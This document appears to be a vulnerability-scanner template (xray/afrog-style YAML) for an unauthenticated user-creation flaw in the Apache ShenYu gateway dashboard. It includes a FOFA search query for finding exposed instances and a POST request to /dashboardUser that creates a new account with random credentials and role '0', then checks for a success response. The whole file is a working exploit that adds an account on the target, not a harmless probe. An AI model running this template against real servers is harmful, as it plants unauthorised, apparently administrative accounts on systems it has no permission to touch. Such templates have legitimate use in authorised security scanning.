id: apache-shenyu-unauth-adduser

info:
  name: Apache Shenyu dashboardUser Unauth add user
  author: rj
  severity: high
  description: |
    fofa: title=="ShenYu Gateway"

set:
  r1: randomLowercase(8)
  r2: randomLowercase(8)

rules:
  r0:
    request:
      method: POST
      path: /dashboardUser
      headers:
        Accept: application/json
        Content-Type: application/json; charset=utf-8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
      body: |-
        {"userName":"{{r1}}","password":"{{r2}}","role":"0","enabled":true}
    expression: response.status == 200 && response.body.bcontains(b'success')
expression: r0()